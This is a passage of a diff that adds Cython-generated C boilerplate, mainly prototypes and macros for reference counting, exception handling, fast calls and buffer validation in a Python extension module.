__Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* ArgTypeTest.proto */ +#define __Pyx_ArgTypeTest(obj, type, none_allowed, name, exact)\ + ((likely(__Pyx_IS_TYPE(obj, type) | (none_allowed && (obj == Py_None)))) ? 1 :\ + __Pyx__ArgTypeTest(obj, type, name, exact)) +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* BuildPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char); + +/* JoinPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char); + +/* StrEquals.proto */ +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyString_Equals __Pyx_PyUnicode_Equals +#else +#define __Pyx_PyString_Equals __Pyx_PyBytes_Equals +#endif + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *); /*proto*/ +/* GetAttr.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *, PyObject *); + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* ObjectGetItem.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); +#else +#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* DivInt[Py_ssize_t].proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t, Py_ssize_t); + +/* UnaryNegOverflows.proto */ +#define __Pyx_UNARY_NEG_WOULD_OVERFLOW(x)\ + (((x) < 0) & ((unsigned long)(x) == 0-(unsigned long)(x))) + +/* GetAttr3.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *, PyObject *, PyObject *); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* AssertionsEnabled.proto */ +#define __Pyx_init_assertions_enabled() +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX < 0x02070600 && !defined(Py_OptimizeFlag) + #define __pyx_assertions_enabled() (1) +#elif PY_VERSION_HEX < 0x03080000 || CYTHON_COMPILING_IN_PYPY || defined(Py_LIMITED_API) + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#elif CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030900A6 + static int __pyx_assertions_enabled_flag; + #define __pyx_assertions_enabled() (__pyx_assertions_enabled_flag) + #undef __Pyx_init_assertions_enabled + static void __Pyx_init_assertions_enabled(void) { + __pyx_assertions_enabled_flag = ! _PyInterpreterState_GetConfig(__Pyx_PyThreadState_Current->interp)->optimization_level; + } +#else + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#endif + +/* RaiseTooManyValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); + +/* RaiseNeedMoreValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); + +/* RaiseNoneIterError.proto */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void); + +/* ExtTypeTest.proto */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type); + +/* GetTopmostException.proto */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); +#endif + +/* SaveResetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +#else +#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) +#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) +#endif + +/* GetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* SwapException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* ssize_strlen.proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +/* ListCompAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len)) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) +#endif + +/* PySequenceMultiply.proto */ +#define __Pyx_PySequence_Multiply_Left(mul, seq) __Pyx_PySequence_Multiply(seq, mul) +static CYTHON_INLINE PyObject* __Pyx_PySequence_Multiply(PyObject *seq, Py_ssize_t mul); + +/* SetItemInt.proto */ +#define __Pyx_SetItemInt(o, i, v, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_SetItemInt_Fast(o, (Py_ssize_t)i, v, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list assignment index out of range"), -1) :\ + __Pyx_SetItemInt_Generic(o, to_py_func(i), v))) +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v); +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, + int is_list, int wraparound, int boundscheck); + +/* RaiseUnboundLocalError.proto */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); + +/* DivInt[long].proto */ +static CYTHON_INLINE long __Pyx_div_long(long, long); + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* HasAttr.proto */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *, PyObject *); + +/* IsLittleEndian.proto */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void); + +/* BufferFormatCheck.proto */ +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts); +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type); + +/* BufferGetAndValidate.proto */ +#define __Pyx_GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)\ + ((obj == Py_None || obj == NULL) ?\ + (__Pyx_ZeroBuffer(buf), 0) :\ + __Pyx__GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)) +static int __Pyx__GetBufferAndValidate(Py_buffer* buf, PyObject* obj, + __Pyx_TypeInfo* dtype, int flags, int nd, int cast, __Pyx_BufFmt_StackElem* stack); +static void __Pyx_ZeroBuffer(Py_buffer* buf); +static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info); +static Py_ssize_t __Pyx_minusones[] = { -1, -1, -1, -1, -1, -1, -1, -1 }; +static Py_ssize_t __Pyx_zeros[] = { 0, 0, 0, 0, 0, 0, 0, 0 }; + +/* UnicodeConcatInPlace.proto */ +# if CYTHON_COMPILING_IN_CPYTHON && PY_MAJOR_VERSION >= 3 + #if CYTHON_REFNANNY + #define __Pyx_PyUnicode_ConcatInPlace(left, right) __Pyx_PyUnicode_ConcatInPlaceImpl(&left, right, __pyx_refnanny) + #else + #define __Pyx_PyUnicode_ConcatInPlace(left, right) __Pyx_PyUnicode_ConcatInPlaceImpl(&left, right) + #endif + static CYTHON_INLINE PyObject *__Pyx_PyUnicode_ConcatInPlaceImpl(PyObject **p_left, PyObject *right + #if CYTHON_REFNANNY + , void* __pyx_refnanny + #endif + ); +#else +#define __Pyx_PyUnicode_ConcatInPlace __Pyx_PyUnicode_Concat +#endif +#define __Pyx_PyUnicode_ConcatInPlaceSafe(left, right) ((unlikely((left) == Py_None) || unlikely((right) == Py_None)) ?\ + PyNumber_InPlaceAdd(left, right) : __Pyx_PyUnicode_ConcatInPlace(left, right)) + +/* SliceObject.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetSlice( + PyObject* obj, Py_ssize_t cstart, Py_ssize_t cstop, + PyObject** py_start, PyObject** py_stop, PyObject** py_slice, + int has_cstart, int has_cstop, int wraparound); + +/* PyObject_Str.proto */ +#define __Pyx_PyObject_Str(obj)\ + (likely(PyString_CheckExact(obj)) ? __Pyx_NewRef(obj) : PyObject_Str(obj)) + +/* PyObjectLookupSpecial.proto */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_LookupSpecialNoError(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 0) +#define __Pyx_PyObject_LookupSpecial(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 1) +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error); +#else +#define __Pyx_PyObject_LookupSpecialNoError(o,n) __Pyx_PyObject_GetAttrStrNoError(o,n) +#define __Pyx_PyObject_LookupSpecial(o,n) __Pyx_PyObject_GetAttrStr(o,n) +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* 